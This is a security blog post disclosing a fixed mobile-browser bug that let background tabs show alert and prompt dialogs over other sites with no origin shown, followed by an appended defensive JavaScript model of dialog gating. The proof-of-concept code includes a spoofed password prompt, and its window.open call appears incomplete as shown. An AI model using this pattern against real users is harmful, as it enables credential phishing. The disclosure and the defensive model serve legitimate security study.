Alert Origin Spoofing

When we use one of the JavaScript functions alert, confirm or prompt, we always get a popup box that starts with the text “https://example.com says:”.
This prefix can seem negligible, but I assure you it’s not.
I think this text is a very important security feature: it allows the user to understand which website is requesting or displaying data.

A few months ago I found a very interesting bug that allowed me to create alerts with no origin identification. I was also able to generate this alert on the current active tab as long as my website was running in one of the background tabs.

Since most browsers use the native device alert, an alert that fires from a timeout will still be visible from any tab.

$("button").click(function (){
   window.open("https://google.com");
   setTimeout(function(){
      alert('Hey!');
   },5000);
});

The code above will let you display alerts over pages from other domains as long as you're using a mobile device. The downside is that the alert will still start with “https://ronmasas.com says:”, so it’s not that interesting.

Luckily, I also found a way to remove the origin: I did it by calling the alert function from an origin-less page. The results were quite good: on iOS devices I completely removed the origin, and on Android it was replaced with the word “JavaScript”.

[Screenshots: iOS Simulator (May 18, 2015) and Android]

var myWindow;

$("button").click(function (){
   setTimeout(function(){
       window.open('https://google.com');
       myWindow = window.open("var password = prompt('Give me your password please',''); window.opener.save(password); window.close();");
   },5000);
});

// Callback function
function save(password){
   alert("Password is " + password);
}

This bug was reported and fixed by Google.
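
The post does not describe how the fix works. The following is an added example, not code from the original post and not Google's fix: a model of two rules that would close both halves of the bug, namely that a background tab's dialog is deferred instead of drawn over the active tab, and that a dialog from an origin-less page is attributed to its opener instead of getting an empty or generic title. The tab objects, `DialogGate`, `dialogTitle` and `originOf` are hypothetical names chosen for illustration.

```javascript
// Added example: a model of a dialog-gating policy. Assumed design, not any browser's code.
// A tab is a constructed object: { id, url, openerUrl }.

function originOf(url) {
  try {
    const u = new URL(url);
    // Only http(s) documents have an origin worth showing to the user.
    return (u.protocol === "https:" || u.protocol === "http:") ? u.origin : null;
  } catch (_) {
    return null; // unparsable URL: treat as origin-less
  }
}

// Title for alert/confirm/prompt. Never empty, never a generic word.
function dialogTitle(tab) {
  const own = originOf(tab.url);
  if (own) return own + " says:";
  // Origin-less document (about:blank, javascript:, data:): blame the opener.
  const opener = tab.openerUrl ? originOf(tab.openerUrl) : null;
  return opener ? "A page opened by " + opener + " says:"
                : "An unidentified page says:";
}

class DialogGate {
  constructor(activeTabId) {
    this.activeTabId = activeTabId;
    this.pending = []; // dialogs requested by background tabs
  }
  // Called when a tab invokes alert(), confirm() or prompt().
  request(tab, message) {
    const dialog = { tabId: tab.id, title: dialogTitle(tab), message };
    if (tab.id === this.activeTabId) return { action: "show", dialog };
    this.pending.push(dialog); // never draw over another tab's content
    return { action: "defer", dialog };
  }
  // Called when the user switches tabs; releases that tab's queued dialogs.
  activate(tabId) {
    this.activeTabId = tabId;
    const ready = this.pending.filter(d => d.tabId === tabId);
    this.pending = this.pending.filter(d => d.tabId !== tabId);
    return ready;
  }
}

// Constructed sample tabs mirroring the scenario in the post.
const attacker = { id: 1, url: "https://ronmasas.com/", openerUrl: null };
const victim = { id: 2, url: "https://google.com/", openerUrl: attacker.url };
const blank = { id: 3, url: "about:blank", openerUrl: attacker.url };
```

With the victim tab active, `new DialogGate(victim.id).request(attacker, "Hey!")` is deferred until the user returns to the attacker's tab, and a prompt from `blank` is titled with the opener's origin.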